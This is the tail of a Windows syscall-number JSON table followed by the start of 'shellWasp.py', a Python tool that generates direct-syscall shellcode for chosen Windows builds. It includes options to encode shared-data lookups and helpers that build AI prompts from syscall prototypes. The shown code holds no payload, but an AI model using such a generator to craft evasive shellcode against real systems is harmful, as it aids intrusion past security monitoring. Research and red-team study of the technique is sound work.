241, "NtCommitComplete": 152, "NtCommitEnlistment": 153, "NtCommitTransaction": 155, "NtCreateEnlistment": 173, "NtCreateResourceManager": 195, "NtCreateTransaction": 205, "NtCreateTransactionManager": 206, "NtEnumerateTransactionObject": 232, "NtFreezeTransactions": 246, "NtGetNotificationResourceManager": 257, "NtOpenEnlistment": 293, "NtOpenResourceManager": 307, "NtOpenTransaction": 313, "NtOpenTransactionManager": 314, "NtPrepareComplete": 318, "NtPrepareEnlistment": 319, "NtPrePrepareComplete": 316, "NtPrePrepareEnlistment": 317, "NtPropagationComplete": 323, "NtPropagationFailed": 324, "NtQueryInformationEnlistment": 339, "NtQueryInformationResourceManager": 342, "NtQueryInformationTransaction": 343, "NtQueryInformationTransactionManager": 344, "NtReadOnlyEnlistment": 372, "NtRecoverEnlistment": 374, "NtRecoverResourceManager": 375, "NtRecoverTransactionManager": 376, "NtRegisterProtocolAddressInformation": 377, "NtRenameTransactionManager": 384, "NtRollbackComplete": 394, "NtRollbackEnlistment": 395, "NtRollbackTransaction": 397, "NtRollforwardTransactionManager": 398, "NtSetInformationEnlistment": 420, "NtSetInformationResourceManager": 424, "NtSetInformationTransaction": 427, "NtSetInformationTransactionManager": 428, "NtSinglePhaseReject": 454, "NtThawRegistry": 465, "NtThawTransactions": 466, "NtDrawText": 227, "NtTraceControl": 467, "NtSetWnfProcessNotificationEvent": 450, "NtSetInformationVirtualMemory": 429, "NtOpenPrivateNamespace": 304, "NtCreatePrivateNamespace": 189, "NtDeletePrivateNamespace": 220, "NtReplacePartitionUnit": 386, "NtSerializeBoot": 403, "NtOpenKeyTransacted": 298, "NtOpenKeyTransactedEx": 299, "NtFreezeRegistry": 245, "NtCreateKeyTransacted": 180, "NtQuerySecurityAttributesToken": 357, "NtWow64CallFunction64": 503, "NtWow64WriteVirtualMemory64": 502, "NtAlpcConnectPortEx": 122, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAreMappedFilesTheSame": 327822, "NtAssignProcessToJobObject": 524431, "NtCreateJobSet": 179, "NtCreateJobObject": 178, "NtOpenJobObject": 296, "NtQueryInformationJobObject": 340, "NtSetInformationJobObject": 422, "NtTerminateJobObject": 459215, "NtCallEnclave": 145, "NtTerminateEnclave": 462, "NtInitializeEnclave": 261, "NtCreateEnclave": 172, "NtLoadEnclaveData": 269, "NtCreateSectionEx": 196, "NtMapViewOfSectionEx": 284, "NtUnmapViewOfSectionEx": 476, "NtCreatePartition": 187, "NtOpenPartition": 303, "NtManagePartition": 281, "NtMapUserPhysicalPages": 655643, "NtAllocateUserPhysicalPagesEx": 116, "NtGetWriteWatch": 258, "NtResetWriteWatch": 786822, "NtCreatePagingFile": 186, "NtCancelIoFileEx": 146, "NtCancelWaitCompletionPacket": 149, "NtCreateWaitCompletionPacket": 208, "NtCompareObjects": 157, "NtCompareTokens": 159, "NtContinueEx": 163, "NtCreateCrossVmEvent": 167, "NtCreateCrossVmMutant": 168, "NtCreateDirectoryObjectEx": 171, "NtCreateIRTimer": 175, "NtCreateLowBoxToken": 182, "NtCreateRegistryTransaction": 194, "NtCreateThreadEx": 199, "NtCreateTimer2": 202, "NtCreateTokenEx": 204, "NtCreateUserProcess": 207, "NtCreateWaitablePort": 209, "NtCreateWnfStateName": 210, "NtDebugContinue": 213, "NtDeleteBootEntry": 215, "NtDeleteDriverEntry": 216, "NtDeleteWnfStateData": 222, "NtDeleteWnfStateName": 223, "NtDirectGraphicsCall": 224, "NtFilterBootOption": 234, "NtFilterToken": 235, "NtFilterTokenEx": 236, "NtGetCachedSigningLevel": 247, "NtGetCompleteWnfStateSubscription": 248, "NtGetContextThread": 249, "NtGetCurrentProcessorNumber": 1638650, "NtGetCurrentProcessorNumberEx": 251, "NtGetDevicePowerState": 459004, "NtImpersonateAnonymousToken": 196867, "NtInitializeRegistry": 263, "NtInitiatePowerAction": 1114376, "NtIsSystemResumeAutomatic": 65801, "NtLoadKeyEx": 273, "NtLockProductActivationKeys": 327955, "NtLockRegistryKey": 196884, "NtMakePermanentObject": 196886, "NtManageHotPatch": 280, "NtMapCMFModule": 282, "NtModifyBootEntry": 285, "NtModifyDriverEntry": 286, "NtNotifyChangeDirectoryFileEx": 288, "NtNotifyChangeMultipleKeys": 290, "NtOpenKeyEx": 297, "NtOpenKeyedEvent": 300, "NtOpenRegistryTransaction": 306, "NtPlugPlayControl": 315, "NtPssCaptureVaSpaceBulk": 325, "NtQueryAuxiliaryCounterFrequency": 327, "NtQueryDebugFilterState": 328010, "NtQueryInformationByName": 337, "NtQueryInstallUILanguage": 262490, "NtQueryLicenseValue": 350, "NtQueryOpenSubKeys": 353, "NtQueryOpenSubKeysEx": 354, "NtQueryPortInformationProcess": 65891, "NtQuerySecurityPolicy": 359, "NtQueryWnfStateNameInformation": 367, "NtRenameKey": 383, "NtResumeProcess": 197000, "NtRevertContainerImpersonation": 393, "NtRollbackRegistryTransaction": 396, "NtSaveKeyEx": 917904, "NtSaveMergedKeys": 721297, "NtSecureConnectPort": 402, "NtSetBootOptions": 405, "NtSetCachedSigningLevel": 406, "NtSetCachedSigningLevel2": 407, "NtSetContextThread": 408, "NtSetDebugFilterState": 655769, "NtSetDefaultUILanguage": 262556, "NtSetIRTimer": 459169, "NtSetInformationDebugObject": 419, "NtSetInformationSymbolicLink": 425, "NtSetLdtEntries": 434, "NtSetSystemEnvironmentValueEx": 440, "NtSetSystemPowerState": 442, "NtSetThreadExecutionState": 328124, "NtSetUuidSeed": 262592, "NtSubscribeWnfStateChange": 458, "NtSuspendProcess": 197067, "NtTranslateFilePath": 1114580, "NtUnloadKey2": 472, "NtUnloadKeyEx": 473, "NtUnsubscribeWnfStateChange": 477, "NtVdmControl": 479, "NtWaitForAlertByThreadId": 393696, "NtWaitForDebugEvent": 481, "NtLoadKey3": 272, "NtAlpcConnectPort": 121, "NtFreeUserPhysicalPages": 244, "KiUserApcDispatcher": 0, "NtAlertThread": 196719, "NtCallbackReturn": 5, "NtQueueApcThread": 69, "NtTestAlert": 131536, "NtAddAtom": 655431, "NtDeleteAtom": 262358, "NtFindAtom": 655380, "NtQueryInformationAtom": 336, "NtSystemDebugControl": 461, "NtDisplayString": 226, "NtRaiseException": 370, "NtRaiseHardError": 371, "NtSetDefaultHardErrorPort": 197018, "NtQuerySystemEnvironmentValue": 362, "NtSetSystemEnvironmentValue": 439, "NtLoadDriver": 268, "NtUnloadDriver": 470, "NtFlushWriteBuffer": 65779, "NtShutdownSystem": 262595, "NtQueryDefaultLocale": 327701, "NtSetDefaultLocale": 328091, "NtAllocateVirtualMemory": 24, "NtFlushVirtualMemory": 242, "NtFreeVirtualMemory": 30, "NtLockVirtualMemory": 277, "NtProtectVirtualMemory": 80, "NtQueryVirtualMemory": 35, "NtReadVirtualMemory": 63, "NtUnlockVirtualMemory": 475, "NtWriteVirtualMemory": 58, "NtQuerySecurityObject": 358, "NtSetSecurityObject": 438, "NtDuplicateObject": 60, "NtMakeTemporaryObject": 196887, "NtQueryObject": 16, "NtSetInformationObject": 92, "NtSignalAndWaitForSingleObject": 1245637, "NtWaitForMultipleObjects": 1900635, "NtWaitForSingleObject": 851972, "NtCreateDebugObject": 169, "NtDebugActiveProcess": 524500, "NtRemoveProcessDebug": 524670, "NtCreateDirectoryObject": 170, "NtOpenDirectoryObject": 88, "NtQueryDirectoryObject": 332, "NtClearEvent": 196670, "NtCreateEvent": 72, "NtOpenEvent": 64, "NtPulseEvent": 459078, "NtQueryEvent": 86, "NtResetEvent": 459141, "NtSetEvent": 458766, "NtSetEventBoostPriority": 196653, "NtCreateEventPair": 174, "NtOpenEventPair": 294, "NtSetHighEventPair": 197023, "NtSetHighWaitLowEventPair": 197024, "NtSetLowEventPair": 197043, "NtSetLowWaitHighEventPair": 197044, "NtWaitHighEventPair": 197092, "NtWaitLowEventPair": 197093, "NtCancelIoFile": 93, "NtCreateFile": 85, "NtCreateMailslotFile": 183, "NtCreateNamedPipeFile": 185, "NtDeleteFile": 217, "NtDeviceIoControlFile": 1769479, "NtFlushBuffersFile": 75, "NtFsControlFile": 1769529, "NtLockFile": 274, "NtNotifyChangeDirectoryFile": 287, "NtOpenFile": 51, "NtQueryAttributesFile": 61, "NtQueryDirectoryFile": 53, "NtQueryEaFile": 334, "NtQueryFullAttributesFile": 335, "NtQueryInformationFile": 17, "NtQueryVolumeInformationFile": 73, "NtReadFile": 1703942, "NtReadFileScatter": 1703982, "NtSetEaFile": 414, "NtSetInformationFile": 39, "NtSetVolumeInformationFile": 449, "NtUnlockFile": 474, "NtWriteFile": 1703944, "NtWriteFileGather": 1703963, "NtCreateIoCompletion": 176, "NtOpenIoCompletion": 295, "NtQueryIoCompletion": 348, "NtRemoveIoCompletion": 1835017, "NtCompactKeys": 156, "NtCompressKey": 196769, "NtCreateKey": 29, "NtDeleteKey": 218, "NtDeleteValueKey": 221, "NtEnumerateKey": 50, "NtEnumerateValueKey": 19, "NtFlushKey": 196848, "NtLoadKey": 270, "NtLoadKey2": 271, "NtNotifyChangeKey": 289, "NtOpenKey": 18, "NtQueryKey": 22, "NtQueryMultipleValueKey": 351, "NtQueryValueKey": 23, "NtReplaceKey": 385, "NtRestoreKey": 391, "NtSaveKey": 524687, "NtSetInformationKey": 423, "NtSetValueKey": 96, "NtUnloadKey": 471, "NtCreateKeyedEvent": 181, "NtReleaseKeyedEvent": 1311099, "NtWaitForKeyedEvent": 1376738, "NtCreateMutant": 184, "NtOpenMutant": 301, "NtQueryMutant": 352, "NtReleaseMutant": 458784, "NtAcceptConnectPort": 2, "NtCompleteConnectPort": 160, "NtConnectPort": 162, "NtCreatePort": 188, "NtImpersonateClientOfPort": 458783, "NtListenPort": 267, "NtQueryInformationPort": 341, "NtReadRequestData": 84, "NtReplyPort": 12, "NtReplyWaitReceivePort": 11, "NtReplyWaitReplyPort": 387, "NtRequestPort": 388, "NtRequestWaitReplyPort": 34, "NtWriteRequestData": 87, "NtCreateProcess": 190, "NtFlushInstructionCache": 786671, "NtOpenProcess": 38, "NtQueryInformationProcess": 25, "NtSetInformationProcess": 28, "NtTerminateProcess": 458796, "NtCreateProfile": 192, "NtQueryIntervalProfile": 328027, "NtSetIntervalProfile": 328111, "NtStartProfile": 197063, "NtStopProfile": 197064, "NtCreateSection": 74, "NtExtendSection": 233, "NtMapViewOfSection": 40, "NtOpenSection": 55, "NtQuerySection": 81, "NtUnmapViewOfSection": 42, "NtCreateSemaphore": 197, "NtOpenSemaphore": 308, "NtQuerySemaphore": 360, "NtReleaseSemaphore": 786442, "NtCreateSymbolicLinkObject": 198, "NtOpenSymbolicLinkObject": 310, "NtQuerySymbolicLinkObject": 361, "NtAlertResumeThread": 458862, "NtContinue": 67, "NtCreateThread": 78, "NtDelayExecution": 393268, "NtImpersonateThread": 260, "NtOpenThread": 311, "NtQueryInformationThread": 37, "NtRegisterThreadTerminatePort": 196986, "NtResumeThread": 458834, "NtSetInformationThread": 13, "NtSuspendThread": 459212, "NtTerminateThread": 458835, "NtYieldExecution": 65606, "NtCancelTimer": 458849, "NtCreateTimer": 201, "NtOpenTimer": 312, "NtQueryTimer": 56, "NtSetTimer": 98, "NtAdjustGroupsToken": 108, "NtAdjustPrivilegesToken": 65, "NtCreateToken": 203, "NtDuplicateToken": 66, "NtOpenProcessToken": 305, "NtOpenThreadToken": 36, "NtQueryInformationToken": 33, "NtSetInformationToken": 426, "NtAccessCheckAndAuditAlarm": 41, "NtCloseObjectAuditAlarm": 59, "NtDeleteObjectAuditAlarm": 219, "NtOpenObjectAuditAlarm": 302, "NtPrivilegeObjectAuditAlarm": 321, "NtPrivilegedServiceAuditAlarm": 322, "NtAccessCheck": 0, "NtAllocateLocallyUniqueId": 262257, "NtAllocateUuids": 1114229, "NtPrivilegeCheck": 786752, "NtQuerySystemInformation": 54, "NtSetSystemInformation": 441, "NtQueryPerformanceCounter": 327729, "NtQuerySystemTime": 1572954, "NtQueryTimerResolution": 655725, "NtSetSystemTime": 328123, "NtSetTimerResolution": 655807, "NtClose": 196623, "NtFlushBuffersFileEx": 237, "NtOpenProcessTokenEx": 48, "NtOpenThreadTokenEx": 47, "NtQueryDirectoryFileEx": 331, "NtQueryQuotaInformationFile": 356, "NtSetQuotaInformationFile": 437}}} ================================================ FILE: start/shellWasp.py ================================================ import os import json from .syscall_signatures import * from .ui import * from keystone import * from binascii import hexlify from .parseconf import * import colorama import copy import sys import ast import traceback import re import datetime from .syscallPossibleValues import syscallPossibleValues from .syscallAIHelper import * from .syscallAiPrompts import * colorama.init() red ='\u001b[31;1m' gre = '\u001b[32;1m' yel = '\u001b[33;1m' blu = '\u001b[34;1m' mag = '\u001b[35;1m' cya = '\u001b[36;1m' whi = '\u001b[37m' res = '\u001b[0m' res2 = '\u001b[0m' oldsysOut=sys.stdout my_stdout = open( 1, "w", buffering = 400000 ) sys.stdout = my_stdout sys.stdout=oldsysOut sampleVals=False showStruct = True # showStruct = False integrateAI=False aiFinalResult = None configOptions={} class shellcode(): def __init__(self): self.osChoices = [] self.show_comments = True self.printStringLiteral = True self.osChoices2 = [] self.list_of_syscalls=[] self.style="fs" self.intendedCompiler="nasm" self.useSharedData=True self.user12Teb=True self.encodeUSD=False self.encodeUSDKey=0x909 self.addUSD=True self.addUSDVal=0x20345242 def style(self): return self.style def comp(self): return self.intendedCompiler def setStyle(self,style): self.style=style def setComp(self,comp): self.intendedCompiler=comp class configOpt(): def __init__(self): self.r22h2=False self.r21h2 =False self.r21h1 =False self.r20h2 =False self.r2004 =False self.r1909 =False self.r1903 =False self.r1809 =False self.r1803 =False self.r1709 =False self.r1703 =False self.r1607 =False self.r1511 =False self.r1507 =False self.b21h2 = False self.b22h2 = False class winReleases(): def __init__(self): # self.win10ReverseLookup={"19044":"21h2", "19043":"21h1", "19042":"20h2", "19041":"2004", "18363":"1909", "18362":"1903", "17763":"1809", "17134":"1803", "16299":"1709", "15063":"1703", "14393":"1607", "10586":"1511", "10240":"1507"} self.win10ReverseLookup={"19044":"21h2, Win10", "19043":"21h1, Win10", "19042":"20h2, Win10", "19041":"2004, Win10", "18363":"1909, Win10", "18362":"1903, Win10", "17763":"1809, Win10", "17134":"1803, Win10", "16299":"1709, Win10", "15063":"1703, Win10", "14393":"1607, Win10", "10586":"1511, Win10", "10240":"1507"} self.win10ReverseLookupHex={"4A64": "21h2", "4A65": "22h2", "4A63": "21h1", "4A62": "20h2", "4A61": "2004", "47BB": "1909", "47BA": "1903", "4563": "1809", "42EE": "1803", "3FAB": "1709", "3AD7": "1703", "3839": "1607", "295A": "1511", "2800": "1507"} # Win11 21h2 build 22000 55F0 self.win11ReverseLookupHex={"55F0":"21h2", "585D":"22h2"} self.win11ReverseLookup={"22000":"21h2, Win11", "22621":"22h2, Win11"} self.winOSReverseLookupHex={"4A64": "Windows 10","4A65": "Windows 10", "4A63": "Windows 10", "4A62": "Windows 10", "4A61": "Windows 10", "47BB": "Windows 10", "47BA": "Windows 10", "4563": "Windows 10", "42EE": "Windows 10", "3FAB": "Windows 10", "3AD7": "Windows 10", "3839": "Windows 10", "295A": "Windows 10", "2800": "Windows 10", "55F0":"Windows 11","585D":"Windows 11", "1DB0":"Windows 7", "1DB1":"Windows 7", "4F7C":"Windows Server 2022"} self.winOSReverseLookup={"4A64":"Windows 10", "4A65": "Windows 10", "21h1":"Windows 10", "20h2":"Windows 10", "2004":"Windows 10", "1909":"Windows 10", "1903":"Windows 10", "1809":"Windows 10", "1803":"Windows 10", "1709":"Windows 10", "1703":"Windows 10", "1607":"Windows 10", "1511":"Windows 10", "1507":"Windows 10","1DB0":"Windows 7", "1DB1":"Windows 7", "4F7C":"Windows Server 2022","55F0":"Windows 11", "585D":"Windows 11"} self.win10ReverseLookupBackup={"4A64":"21h2", "4A65":"22h2","21h1":"21h1", "20h2":"20h2", "2004":"2004", "1909":"1909", "1903":"1903", "1809":"1809", "1803":"1803", "1709":"1709", "1703":"1703", "1607":"1607", "1511":"1511", "1507":"1507"} # Windows Server 2022 build 20348 4F7C # Windows 7 Sp0 7600 1DB0 # Windows 7 Sp1 7601 1DB1 self.win7ReverseLookupHex={"1DB0":"SP0", "1DB1":"SP1"} self.win7ReverseLookup={"7600":"Win7, Sp0", "7601":"Win7, Sp1"} self.winServer22ReverseLookupHex={"4F7C":"20348, Windows Server 2022"} self.winOSBoolSelected={"4A64": False, "4A65": False, "4A63": False, "4A62": False, "4A61": False, "47BB": False, "47BA": False, "4563": False, "42EE": False, "3FAB": False, "3AD7": False, "3839": False, "295A": False, "2800": False, "55F0":False, "585D":False,"1DB0":False, "1DB1":False, "4F7C":False} self.releaseOptions={"r14":"4A65","r13":"4A64", "r12":"21h1", "r11":"20h2", "r10":"2004", "r9":"1909", "r8":"1903", "r7":"1809", "r6":"1803", "r5":"1709", "r4":"1703", "r3":"1607", "r2":"1511", "r1":"1507", "sp1":"1DB1", "sp0":"1DB0", "b1":"55F0", "b2":"585D"} self.osChoiceToHex={"4A64":"4A64","4A65":"4A65", "21h1":"4A63", "20h2":"4A62", "2004":"4A61", "1909":"47BB", "1903":"47BA", "1809":"4563", "1803":"42EE", "1709":"3FAB", "1703":"3AD7", "1607":"3839", "1511":"295A", "1507":"2800", "1DB1":"1DB1", "1DB0":"1DB0", "55F0":"55F0", "585D":"585D"} self.listWin7Vals=["1DB0", "1DB1"] self.listWin1011Vals=["4A64", "4A65","21h1","20h2","2004","1909","1903","1809","1803","1709","1703","1607","1511","1507","55F0", "585D"] class winSyscalls(): def __init__(self): with open(os.path.join(os.path.dirname(__file__), 'WinSysCalls.json'), 'r') as syscall_file: self.syscall_dict = json.load(syscall_file) with open(os.path.join(os.path.dirname(__file__), 'reverseWinSyscallsInt.json'), 'r') as syscall_file: self.reverseSyscall_dict = json.load(syscall_file) class shellBytes: def __init__(self): self.stringLiteral="" self.shellcode=[] self.count=0 self.bytesShellcode="" self.shellCodeStrLit="" # with open(os.path.join(os.path.dirname(__file__), 'syscall_signatures.json'), 'r') as syscall_file: # syscallPrototypes = json.load(syscall_file) conFile = str("config.cfg") def checkWinOSBools(): # print ("builds.winOSBoolSelected", builds.winOSBoolSelected) builds.winOSBoolSelected["4A64"]=False builds.winOSBoolSelected["4A65"]=False builds.winOSBoolSelected["21h1"]=False builds.winOSBoolSelected["20h2"]=False builds.winOSBoolSelected["2004"]=False builds.winOSBoolSelected["1909"]=False builds.winOSBoolSelected["1903"]=False builds.winOSBoolSelected["1809"]=False builds.winOSBoolSelected["1803"]=False builds.winOSBoolSelected["1709"]=False builds.winOSBoolSelected["1703"]=False builds.winOSBoolSelected["1607"]=False builds.winOSBoolSelected["1511"]=False builds.winOSBoolSelected["1507"]=False builds.winOSBoolSelected["1DB0"]=False builds.winOSBoolSelected["1DB1"]=False builds.winOSBoolSelected["55F0"]=False builds.winOSBoolSelected["585D"]=False # print ("current choices", sh.osChoices2) for myOs in sh.osChoices2: builds.winOSBoolSelected[myOs]=True def readConf(): con = Configuration(conFile) conr = con.readConf() r22h2= conr.getboolean('Windows 10','r22h2') builds.winOSBoolSelected["4A65"]=r22h2 r21h2= conr.getboolean('Windows 10','r21h2') builds.winOSBoolSelected["4A64"]=r21h2 r21h1= conr.getboolean('Windows 10','r21h1') builds.winOSBoolSelected["21h1"]=r21h1 r20h2= conr.getboolean('Windows 10','r20h2') builds.winOSBoolSelected["20h2"]=r20h2 r2004= conr.getboolean('Windows 10','r2004') builds.winOSBoolSelected["2004"]=r2004 r1909= conr.getboolean('Windows 10','r1909') builds.winOSBoolSelected["1909"]=r1909 r1903= conr.getboolean('Windows 10','r1903') builds.winOSBoolSelected["1903"]=r1903 r1809= conr.getboolean('Windows 10','r1809') builds.winOSBoolSelected["1809"]=r1809 r1803= conr.getboolean('Windows 10','r1803') builds.winOSBoolSelected["1803"]=r1803 r1709= conr.getboolean('Windows 10','r1709') builds.winOSBoolSelected["1709"]=r1709 r1703= conr.getboolean('Windows 10','r1703') builds.winOSBoolSelected["1703"]=r1703 r1607= conr.getboolean('Windows 10','r1607') builds.winOSBoolSelected["1607"]=r1607 r1511= conr.getboolean('Windows 10','r1511') builds.winOSBoolSelected["1511"]=r1511 r1507= conr.getboolean('Windows 10','r1507') builds.winOSBoolSelected["1507"]=r1507 Win7SP0=conr.getboolean('Windows 7','SP0') builds.winOSBoolSelected["1DB0"]=Win7SP0 Win7SP1=conr.getboolean('Windows 7','SP1') builds.winOSBoolSelected["1DB1"]=Win7SP1 Win11_21h2=conr.getboolean('Windows 11','b21h2') builds.winOSBoolSelected["55F0"]=Win11_21h2 Win11_22h2=conr.getboolean('Windows 11','b22h2') builds.winOSBoolSelected["585D"]=Win11_22h2 sh.printStringLiteral=conr.getboolean('MISC','print_string_literal_of_bytes') sh.show_comments=conr.getboolean('MISC','show_comments') sh.style=conr.get('MISC', 'syscall_style') sh.intendedCompiler=conr.get('MISC', 'intended_compiler') sh.useSharedData=conr.getboolean('MISC','use_shareddata_for_win1011') sh.encodeUSD=conr.getboolean('MISC','encode_user_share_data') sh.addUSD=conr.getboolean('MISC','usd_encode_with_add') sh.user12Teb=conr.getboolean('MISC','get_teb_from_r12') temp=conr.get('MISC', 'usd_encode_xor_key') temp2=conr.get('MISC', 'usd_encode_add_val') try: sh.encodeUSDKey=int(temp) except: sh.encodeUSDKey=int(temp,16) try: sh.addUSDVal=int(temp2) except: sh.addUSDVal=int(temp2,16) # print (red+str(sh.show_comments)+res, "sh.show_comments") if r22h2: sh.osChoices2.append("4A65") if r21h2: sh.osChoices2.append("4A64") if r21h1: sh.osChoices2.append("21h1") if r20h2: sh.osChoices2.append("20h2") if r2004: sh.osChoices2.append("2004") if r1909: sh.osChoices2.append("1909") if r1903: sh.osChoices2.append("1903") if r1809: sh.osChoices2.append("1809") if r1803: sh.osChoices2.append("1803") if r1709: sh.osChoices2.append("1709") if r1703: sh.osChoices2.append("1703") if r1607: sh.osChoices2.append("1607") if r1511: sh.osChoices2.append("1511") if r1507: sh.osChoices2.append("1507") if Win7SP0: sh.osChoices2.append("1DB0") if Win7SP1: sh.osChoices2.append("1DB1") if Win11_21h2: sh.osChoices2.append("55F0") if Win11_22h2: sh.osChoices2.append("585D") # print ("sh.osChoices2!!!") # print (sh.osChoices2) sh.list_of_syscalls = str(conr['SYSCALLS']['selected_syscalls']) try: sh.list_of_syscalls = ast.literal_eval(sh.list_of_syscalls) if(type(sh.list_of_syscalls) != list): print("Error:", sh.list_of_syscalls, "<-- this should be in list format.") except: print(yel + "The value of", red + sh.list_of_syscalls, yel + "is not correct or malformed!!"+ res) sys.exit() sanitizeSyscalls() # print ("listofSyscalls", sh.list_of_syscalls) def sanitizeSyscallsAdded(tempSys2): addedSyscalls=[] for term in tempSys2: if term.lower() in syscallLowerLookupDict: term=syscallLowerLookupDict[term.lower()] addedSyscalls.append(term) return addedSyscalls def sanitizeSyscalls(): t=0 for term in sh.list_of_syscalls: if term.lower() in syscallLowerLookupDict: term=syscallLowerLookupDict[term.lower()] sh.list_of_syscalls[t]=term else: print (red+"The " +yel + term +red + " syscall is not present. Check spelling. Item removed."+res) del sh.list_of_syscalls[t] t+=1 def saveConf(con): global configOptions try: con.changeConf(configOptions) con.save() print(gre + "\tConfiguration has been Saved.\n" + res) except Exception as e: print(red + "\tCould not save configuration." + res, e) print(traceback.format_exc()) def modConf(): global configOptions # self.winOSBoolSelected={"4A64": False, "4A63": False, "4A62": False, "4A61": False, "47BB": False, "47BA": False, "4563": False, "42EE": False, "3FAB": False, "3AD7": False, "3839": False, "295A": False, "2800": False, "55F0":False, "1DB0":False, "1DB1":False, "4F7C":False} # listofStrings = ['pushret', # 'callpop', # 'fstenv', # 'syscall', # 'heaven', # 'peb', # 'disassembly', # 'pebpresent', # 'bit32', # 'max_bytes_forward', # 'max_bytes_backward', # 'max_lines_forward', # 'max_lines_backward', # 'print_to_screen', # 'push_stack_strings', # 'ascii_strings', # 'wide_char_strings', # 'fast_mode', # 'find_all', # 'dist_mode', # 'cpu_count', 'nodes_file', 'output_file', 'dec_operation_type', 'decrypt_file', 'stub_file', 'use_same_file', 'stub_entry_point', 'stub_end', 'shellEntry', 'pebpoints', 'minimum_str_length', 'max_callpop_distance', 'default_outdir', 'print_emulation_result', 'emulation_verbose_mode', 'emulation_multiline','max_num_of_instr','iterations_before_break','break_infinite_loops','timeless_debugging',"complete_code_coverage"] # maxEmuInstr = emuObj.maxEmuInstr # numOfIter = emuObj.numOfIter # numOfIter = em.maxLoop # listofBools = [bPushRet, bCallPop, bFstenv, bSyscall, bHeaven, bPEB, bDisassembly, pebPresent, bit32, bytesForward, bytesBack, linesForward, linesBack,p2screen, bPushStackStrings, bAsciiStrings, bWideCharStrings, dFastMode, dFindAll, dDistr, dCPUcount, dNodesFile, dOutputFile, decryptOpTypes, decryptFile, stubFile, sameFile, stubEntry, stubEnd, shellEntry, pebPoints, minStrLen, maxDistance, sharem_out_dir, bPrintEmulation, emulation_verbose, emulation_multiline, maxEmuInstr, numOfIter, emuObj.breakLoop, emuObj.verbose,em.codeCoverage] show_commentsVal=sh.show_comments syscallStyleVal=sh.style intendedCompilerVal=sh.intendedCompiler useSharedDataVal=sh.useSharedData boolEncodeUSD=sh.encodeUSD encodeXorKeyVal=hex(sh.encodeUSDKey) boolEncodeWAdd=sh.addUSD encodeAddValsh=hex(sh.addUSDVal) checkWinOSBools() r21h2 = builds.winOSBoolSelected["4A64"] r22h2 = builds.winOSBoolSelected["4A65"] r21h1 = builds.winOSBoolSelected["21h1"] r20h2 = builds.winOSBoolSelected["20h2"] r2004 = builds.winOSBoolSelected["2004"] r1909 = builds.winOSBoolSelected["1909"] r1903 = builds.winOSBoolSelected["1903"] r1809 = builds.winOSBoolSelected["1809"] r1803 = builds.winOSBoolSelected["1803"] r1709 = builds.winOSBoolSelected["1709"] r1703 = builds.winOSBoolSelected["1703"] r1607 = builds.winOSBoolSelected["1607"] r1511 = builds.winOSBoolSelected["1511"] r1507 = builds.winOSBoolSelected["1507"] sp0 = builds.winOSBoolSelected["1DB0"] sp1 = builds.winOSBoolSelected["1DB1"] b21h2 = builds.winOSBoolSelected["55F0"] b22h2 = builds.winOSBoolSelected["585D"] listofStrings=["r21h2", "r22h2", "r21h1", "r20h2", "r2004", "r1909", "r1903", "r1809", "r1803", "r1709", "r1703", "r1607", "r1511","r1507","sp0","sp1", "b21h2", "b22h2","show_comments","syscall_style", "intended_compiler","use_shareddata_for_win1011","encode_user_share_data","usd_encode_xor_key", "usd_encode_with_add","usd_encode_add_val","get_teb_from_r12"] listofBools=[r21h2,r22h2, r21h1, r20h2, r2004, r1909, r1903, r1809, r1803, r1709, r1703, r1607, r1511, r1507,sp0,sp1,b21h2, b22h2, show_commentsVal,syscallStyleVal,intendedCompilerVal,useSharedDataVal,boolEncodeUSD,encodeXorKeyVal,boolEncodeWAdd,encodeAddValsh,sh.user12Teb] listofStrings.append("selected_syscalls") listofBools.append(sh.list_of_syscalls) # print (listofStrings) # print(listofBools) # listofSyscalls = [] # for osv in syscallSelection: # if osv.toggle == True: # listofSyscalls.append(osv.code) # listofStrings.append('selected_syscalls') # listofBools.append(listofSyscalls) # for booli, boolStr in zip(listofBools, listofStrings): # configOptions[boolStr] = booli # Win7SP0=conr.getboolean('Windows 7','SP0') # builds.winOSBoolSelected["1DB0"]=Win7SP0 # Win7SP1=conr.getboolean('Windows 7','SP1') # builds.winOSBoolSelected["1DB1"]=Win7SP1 # Win11_21h2=conr.getboolean('Windows 11','r21h2') # builds.winOSBoolSelected["55F0"]=Win11_21h2 # sh.printStringLiteral=conr.getboolean('MISC','print_string_literal_of_bytes') # sh.show_comments=conr.getboolean('MISC','show_comments') # maxEmuInstr = emuObj.maxEmuInstr # numOfIter = emuObj.numOfIter # numOfIter = em.maxLoop # listofBools = [bPushRet, bCallPop, bFstenv, bSyscall, bHeaven, bPEB, bDisassembly, pebPresent, bit32, bytesForward, bytesBack, linesForward, linesBack,p2screen, bPushStackStrings, bAsciiStrings, bWideCharStrings, dFastMode, dFindAll, dDistr, dCPUcount, dNodesFile, dOutputFile, decryptOpTypes, decryptFile, stubFile, sameFile, stubEntry, stubEnd, shellEntry, pebPoints, minStrLen, maxDistance, sharem_out_dir, bPrintEmulation, emulation_verbose, emulation_multiline, maxEmuInstr, numOfIter, emuObj.breakLoop, emuObj.verbose,em.codeCoverage] # listofBools=[] # listofSyscalls = [] # for osv in syscallSelection: # if osv.toggle == True: # listofSyscalls.append(osv.code) # listofStrings.append('selected_syscalls') # listofBools.append(listofSyscalls) try: for booli, boolStr in zip(listofBools, listofStrings): # print (boolStr, booli) if type (booli)==bool: booli=(str(booli)) configOptions[boolStr] = booli # print (configOptions) except Exception as e: print (e) print(traceback.format_exc()) # print (configOptions) def isWin7(): if any(item in builds.listWin7Vals for item in sh.osChoices2): # print ("WINDOWS 7!!!") # print (sh.osChoices2) return True else: return False def isWin1011(): if any(item in builds.listWin1011Vals for item in sh.osChoices2): # print ("WINDOWS 10!!!") # print (sh.osChoices2) return True else: return False def buildAiPromptSectionForSyscall(mySyscall, syscall_signature, syscallHeaderSuffixes=None): """ Build one AI prompt section like: this is for an ntdll user mode call [ntdll!NtWriteVirtualMemory] push 0x00000000 ; PULONG NumberOfBytesWritten ... """ if syscallHeaderSuffixes is None: syscallHeaderSuffixes = {} sysPrototype = syscall_signature[mySyscall] numSyscallParams = sysPrototype[0] t = numSyscallParams - 1 extraText = syscallHeaderSuffixes.get(mySyscall, "") header = f"this is for an ntdll user mode call [ntdll!{mySyscall}]" if extraText: header += f" {extraText}" lines = [header, ""] for each in range(numSyscallParams): paramType = sysPrototype[1][t] paramName = sysPrototype[2][t] # Keep this simple and stable for the AI prompt. line = f"push 0x00000000 ; {paramType} {paramName}" lines.append(line) t -= 1 lines.append("") 